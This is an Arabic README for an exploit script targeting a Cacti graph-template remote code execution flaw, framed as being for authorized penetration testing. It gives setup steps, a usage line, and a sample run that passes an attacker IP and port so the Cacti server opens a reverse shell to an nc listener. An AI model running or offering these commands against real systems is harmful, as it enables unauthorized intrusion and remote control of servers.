
استغلال تنفيذ التعليمات البرمجية عن بُعد المصادق عليه لثغرة قالب الرسم البياني في Cacti، مع حمولة صدفة عكسية ودعم وكيل لاختبار الاختراق المصرح به.
هام — اقرأ هذا أولاً:
هذا المستودع وملفexploit.pyمُقدَّم لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الكود ضد أنظمة أو شبكات أو خدمات ليس لديك تصريح صريح كتابي لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. باستخدام هذا الكود، فإنك توافق على اتباع القوانين المعمول بها والسياسات المؤسسية.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
قبل تشغيل السكربت، تأكد من تشغيل مستمع nc. قم بتشغيل السكربت بدون بروكسي إلا في حالة التصحيح:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
تذكير أخير: هذا السكربت وملف README مخصصان للاستخدام التعليمي فقط. لا تستخدم هذه الأدوات أبدًا للوصول غير القانوني إلى الأنظمة.